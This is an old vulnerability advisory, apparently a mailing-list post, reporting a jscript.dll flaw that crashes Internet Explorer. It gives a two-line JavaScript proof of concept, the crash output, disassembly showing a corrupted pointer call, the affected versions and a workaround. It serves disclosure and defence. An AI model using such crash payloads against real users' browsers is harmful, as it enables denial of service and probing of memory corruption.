hi,

i found a bug in jscript.dll... here is a small report on it...
 
--------
Abstract
--------

Microsoft Corp.'s Windows Script Engine within the Windows operating
system (OS) interprets and executes script code written in scripting
languages such as VBscript and JScript. Such script code can be used to
add functionality to web pages, or to automate tasks within the OS or a
program. Script code can be written in several different scripting
languages, such as Visual Basic Script, JScript or JavaScript.

-----------
Description
-----------
By passing malicious JavaScript via Internet Explorer (IE), Outlook or
Outlook Express, remote attackers can crash Internet Explorer.. 
The bug lies in the Windows Script Engine's implementation of
JScript that is provided by jscript.dll (located in %SystemRoot%\system32).
The following snippet of JavaScript code demonstrates the existence of the
bug by crashing IE on a vulnerable Windows system:

----------
Exploit
----------

<script>
  this.window();
</script>

or....

<script>
  self.window();
</script>
 
---------
Notes
---------

IE crashes in Win2k... with the following error
----------------------------------------------------
The instruction at "0x6b73aa15" referenced memory at "0x006f0063".
The memory could not be "read".
----------------------------------------------------

Disassembly... of JScript.dll[5.6.08513]...
6B73AA0A   je          6B73AA25
6B73AA0C   mov         eax,dword ptr [ebp-64h]
6B73AA0F   mov         eax,dword ptr [eax+8]
6B73AA12   mov         ecx,dword ptr [eax]
6B73AA14   push        eax
6B73AA15   call        dword ptr [ecx+8]        <--- illegal op
6B73AA18   mov         edx,dword ptr [ebp-4Ch]
6B73AA1B   push        edx
6B73AA1C   call        dword ptr ds:[6B773218h]
6B73AA22   add         esp,4
6B73AA25   mov         eax,dword ptr [ebp-34h]
6B73AA28   jmp         6B7213CB
6B73AA2D   mov         esi,dword ptr [ebp+18h]


we find that the value in ecx [ie. value at memory location
pointed by eax is corrupted...].


Please Note:
a few times the IE didn't cause an exception, instead it went sort of a hung state..
the home/stop button or and any new url typed in the url box didn't work..

---------------------------
Possible Solution
---------------------------
Disable Active Scripting


---------------
Tested On
---------------
IE 5.01 (Win2000)
IE 5.5  (Win98SE)
IE 6.0  (WinXP)

ie.
JSCript.dll versions
5.1.0.8513 (Win2000)
5.5.0.8513 (Win98SE)
5.6.0.6626 (WinXP Pro)
5.6.0.8513 (WIn2000)


----------
Credits
----------
Real Name : Gregory R. Panakkal
Handle    : junkcode
E-Mail    : junkcode@gmx.net
WWW       : www.evilcreations.net/junkcode/  (OR)  www.crapware.tk

rgds,
junkcode